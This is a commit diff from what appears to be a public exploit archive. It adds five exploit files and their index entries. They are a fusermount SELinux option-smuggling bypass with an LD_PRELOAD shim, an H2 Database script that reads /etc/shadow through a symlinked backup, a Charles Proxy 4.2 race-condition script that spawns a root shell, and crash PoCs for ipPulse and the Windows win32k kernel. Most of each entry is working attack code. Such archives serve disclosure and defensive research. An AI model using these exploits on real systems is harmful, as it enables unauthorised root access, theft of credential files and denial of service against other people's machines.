DB: 2018-07-31

5 changes to exploits/shellcodes fusermount - user_allow_other Restriction Bypass and SELinux Label Control ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC) Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC) Charles Proxy 4.2 - Local Privilege Escalation H2 Database 1.4.197 - Information Disclosure
2018-07-31 05:01:47 +00:00 · 2018-07-31 05:01:47 +00:00 · b02440845e
commit b02440845e
parent 582d8f748e
6 changed files with 357 additions and 0 deletions
--- a/exploits/linux/dos/45106.c
+++ b/exploits/linux/dos/45106.c
@ -0,0 +1,100 @@
+/*
+It is possible to bypass fusermount's restrictions on the use of the
+"allow_other" mount option as follows if SELinux is active.
+
+Here's a minimal demo, tested on a Debian system with SELinux enabled in
+permissive mode:
+
+===============================================
+uuser@debian:~$ mount|grep /mount
+user@debian:~$ grep user_allow_other /etc/fuse.conf 
+#user_allow_other
+user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/
+fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf
+user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount
+sending file descriptor: Bad file descriptor
+user@debian:~$ mount|grep /mount
+/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
+===============================================
+
+Here's a demo that actually mounts a real FUSE filesystem with allow_other,
+again on a Debian system configured to use SELinux:
+===============================================
+user@debian:~$ cat fuse-shim.c
+*/
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <dlfcn.h>
+#include <stdlib.h>
+int execv(const char *path, char *const argv_[]) {
+  char **argv = (void*)argv_; /* cast away const */
+  for (char **argvp = argv; *argvp != NULL; argvp++) {
+    char *arg = *argvp;
+    for (char *p = arg; *p; p++) {
+      if (*p == '#') *p = '\\';
+    }
+  }
+  int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv");
+  execv_real(path, argv_);
+}
+
+/*
+user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl
+user@debian:~$ echo hello world > hello.txt
+user@debian:~$ zip hello.zip hello.txt
+  adding: hello.txt (stored 0%)
+user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount
+user@debian:~$ mount|grep /mount
+fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
+user@debian:~$ sudo bash
+root@debian:/home/user# ls -laZ mount
+total 5
+drwxrwxr-x.  3 root root system_u:object_r:fusefs_t:s0-s0:c0    0 Jul 18 02:19 .
+drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0    4096 Jul 18 02:19 ..
+-rw-r--r--.  1 user user system_u:object_r:fusefs_t:s0-s0:c0   12 Jul 18 02:19 hello.txt
+root@debian:/home/user# cat mount/hello.txt
+hello world
+===============================================
+
+
+I have tested that this also works on Fedora (which, unlike Debian, has SELinux
+enabled by default.)
+
+
+Unfortunately, I only noticed that this was possible after I publicly sent some
+fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268),
+when the maintainer asked a question about one of the patches.
+
+
+Breaking down the attack, the problems are:
+
+1. fusermount's do_mount() is written as if backslashes escape commas in mount
+   options; however, this is only true for the "fsname" and "subtype"
+   pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE
+   filesystem follow those semantics. This means that an attacker can smuggle
+   a forbidden option through fusermount's checks if the previous option ends
+   with a backslash. However, no option accepted by the FUSE filesystem can end
+   with a backslash, so this seemed unexploitable at first.
+   This is fixed by the following commit in my pull request:
+   https://github.com/libfuse/libfuse/pull/268/commits/455e73588357
+2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain
+   the mount options understood by the SELinux and Smack LSMs. LSMs have the
+   opportunity to grab mount options and make them invisible to the actual
+   filesystem through the security_sb_copy_data() security hook.
+   For this attack, I'm using the "context" option.
+   This is fixed by the following commit in my pull request:
+   https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4
+3. The SELinux LSM is slightly lax about parsing the level component of SELinux
+   context strings when the policy uses Multi-Level Security (MLS).
+   When using MLS, the format of a context string is
+   "<user>:<role>:<type>:<level>"; the level component is parsed by
+   mls_context_to_sid(). The level component is supposed to specify a
+   sensitivity range (one or two parts delimited with '-'); each part of the
+   range may be followed by ':' and a category set specification.
+   If the sensitivity range consists of two parts and the second part of the
+   range is followed by a category set, the function incorrectly marks a
+   trailing '-' and any following data until ':' or '\0' as consumed, but does
+   not actually parse this data. This allows an attacker to smuggle a backslash
+   through.
+*/
--- a/exploits/linux/webapps/45105.py
+++ b/exploits/linux/webapps/45105.py
@ -0,0 +1,68 @@
+# Exploit Title: H2 Database 1.4.197 - Information Disclosure
+# Date: 2018-07-16
+# Exploit Author: owodelta
+# Vendor Homepage: www.h2database.com
+# Software Link: http://www.h2database.com/html/download.html
+# Version: all versions
+# Tested on: Linux
+# CVE : CVE-2018-14335
+
+# Description: Insecure handling of permissions in the backup function allows
+# attackers to read sensitive files (outside of their permissions) via a
+# symlink to a fake database file.
+
+# PS, thanks to HTB and our team FallenAngels
+
+#!/usr/bin/python
+
+import requests
+import argparse
+import os
+import random
+
+def cleanup(wdir):
+	cmd = "rm {}symlink.trace.db".format(wdir)
+	os.system(cmd)
+
+def create_symlink(file, wdir):
+	cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
+	os.system(cmd)
+
+
+def trigger_symlink(host, wdir):
+	outputName = str(random.randint(1000,10000))+".zip"
+	#get cookie
+	url = 'http://{}'.format(host)
+	r = requests.get(url)
+	path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
+	url = '{}/{}'.format(url,path)
+	payload = {
+			"tool":"Backup",
+			"args":"-file,"+wdir+outputName+",-dir,"+wdir}
+	#print url
+	requests.post(url,data=payload).text
+	print "File is zipped in: "+wdir+outputName
+
+if __name__ == "__main__":
+	parser = argparse.ArgumentParser()
+	required = parser.add_argument_group('required arguments')
+	required.add_argument("-H",
+			"--host",
+			metavar='127.0.0.1:8082',
+			help="Target host",
+            required=True)
+	required.add_argument("-D",
+			"--dir",
+			metavar="/tmp/",
+			default="/tmp/",
+			help="Writable directory")
+	required.add_argument("-F",
+			"--file",
+			metavar="/etc/shadow",
+			default="/etc/shadow",
+			help="Desired file to read",)
+	args = parser.parse_args()
+
+create_symlink(args.file,args.dir)
+trigger_symlink(args.host,args.dir)
+cleanup(args.dir)
--- a/exploits/macos/local/45107.txt
+++ b/exploits/macos/local/45107.txt
@ -0,0 +1,80 @@
+Charles Proxy is a great mac application for debugging web services and
+inspecting SSL traffic for any application on your machine.
+
+In order to inspect the SSL traffic it needs to configure the system to use a
+proxy so that it can capture the packets and use its custom root CA to decode
+the SSL.
+
+Setting a system-wide proxy requires root permissions so this is handled by an
+suid binary located within the Charles application folder:
+
+/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
+
+Unfortunately this binary is vulnerable to a race condition which allows a local
+user to spawn a root shell. It supports a parameter "--self-repair" which it
+uses to re-set the root+suid permissions on itself, with a graphical dialog
+shown to the user. However if this is called when the binary is already
+root+suid then no password dialog is shown.
+
+It doesn't validate the path to itself and uses a simple API call to get the
+path to the binary at the time it was invoked. This means that between executing
+the binary and reaching the code path where root+suid is set there is enough
+time to replace the path to the binary with an alternate payload which will then
+receive the suid+root permissions instead of the Charles binary.
+
+This issue was fixed in Charles 4.2.1 released in November 2017.
+
+https://m4.rkw.io/charles_4.2.sh.txt
+2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
+-------------------------------------------------------------------------------
+#!/bin/bash
+
+####################################################
+###### Charles 4.2 local root privesc exploit ######
+###### by m4rkw - https://m4.rkw.io/blog.html ######
+####################################################
+
+cd
+user="`whoami`"
+
+cat > charles_exploit.c <<EOF
+#include <unistd.h>
+int main()
+{
+  setuid(0);
+  seteuid(0);
+  execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
+  return 0;
+}
+EOF
+
+gcc -o charles_exploit charles_exploit.c
+if [ $? -ne 0 ] ; then
+  echo "failed to compile the exploit, you need xcode cli tools for this."
+  exit 1
+fi
+rm -f charles_exploit.c
+
+ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
+./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
+rm -f ./Charles\ Proxy\ Settings
+mv charles_exploit Charles\ Proxy\ Settings
+
+i=0
+
+while :
+do
+  r=`ls -la Charles\ Proxy\ Settings |grep root`
+  if [ "$r" != "" ] ; then
+    break
+  fi
+  sleep 0.1
+  i=$((i+1))
+  if [ $i -eq 10 ] ; then
+    rm -f Charles\ Proxy\ Settings
+    echo "Not vulnerable"
+    exit 1
+  fi
+done
+
+./Charles\ Proxy\ Settings
--- a/exploits/windows/dos/45102.py
+++ b/exploits/windows/dos/45102.py
@ -0,0 +1,26 @@
+# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-07-27
+# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
+# Software Link : http://download.netscantools.com/ipls192.zip
+# Tested Version: 1.92
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python ipPulse_1.92.py
+# 2.- Open ipPulse_1.92.txt and copy content to clipboard
+# 3.- Open ippulse.exe
+# 4.- Target Editor
+# 5.- Paste ClipBoard on "IP Address/HostName"
+# 6.- Paste ClipBoard on "Comment"
+# 7.- Add Above Fields to Target List >>
+# 8.- OK
+# 9.- Crashed
+
+#!/usr/bin/env python
+ 
+buffer = "\x41" * 3400
+f = open ("ipPulse_1.92.txt", "w")
+f.write(buffer)
+f.close()
--- a/exploits/windows/dos/45104.c
+++ b/exploits/windows/dos/45104.c
@ -0,0 +1,78 @@
+# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
+# Author: vportal
+# Date: 2018-07-27
+# Vendor homepage: http://www.microsoft.com
+# Version: Windows 7 x86
+# Tested on: Windows 7 x86
+# CVE: N/A
+
+# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system 
+# call NtUserConsoleControl with the following arguments:
+
+# NtUserControlConsole(1,0,8).
+# NtUserControlConsole(4,0,8).
+# NtUserControlConsole(6,0,12).
+# NtUserControlConsole(2,0,12).
+# NtUserControlConsole(3,0,20).
+# NtUserControlConsole(5,0,8).
+
+# Different crashes are reproduced for each case. For the second case the crash is showed below:
+# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria 
+# en 0x%08lx. La memoria no se pudo %s.
+# FAULTING_IP:
+# win32k!xxxSetConsoleCaretInfo+c
+# 93310641 8b0e            mov     ecx,dword ptr [esi]
+
+# TRAP_FRAME:  8c747b2c -- (.trap 0xffffffff8c747b2c)
+# ErrCode = 00000000
+# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
+# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0         nv up ei ng nz ac po nc
+# cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010292
+# win32k!xxxSetConsoleCaretInfo+0xc:
+# 93310641 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????
+# Resetting default scope
+
+# CUSTOMER_CRASH_COUNT:  1
+# DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT
+# BUGCHECK_STR:  0x8E
+# PROCESS_NAME:  Win32k-fuzzer_
+
+# CURRENT_IRQL:  0
+# LAST_CONTROL_TRANSFER:  from 9330fc27 to 93310641
+
+# STACK_TEXT: 
+# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
+# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
+# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
+# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
+# WARNING: Frame IP not in any known module. Following frames may be wrong.
+# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
+
+# PoC code:
+
+#include <Windows.h>
+
+extern "C"
+
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) 
+{
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+
+int st = 0;
+int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
+
+LoadLibrary(L"user32.dll");
+
+st = (int)SystemCall32(syscall_ID, 4, 0, 8);
+
+return 0;
+}
+
+# The vulnerability has only been tested  in Windows 7 x86.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port
 44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
+45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
 44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
 44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
@ -6030,6 +6031,8 @@ id,file,description,date,author,type,platform,port
 45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
 45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
 45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple,
+45102,exploits/windows/dos/45102.py,"ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)",2018-07-30,"Luis Martínez",dos,windows,
+45104,exploits/windows/dos/45104.c,"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)",2018-07-30,vportal,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9835,6 +9838,7 @@ id,file,description,date,author,type,platform,port
 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
+45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39714,3 +39718,4 @@ id,file,description,date,author,type,platform,port
 45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
 45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
+45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,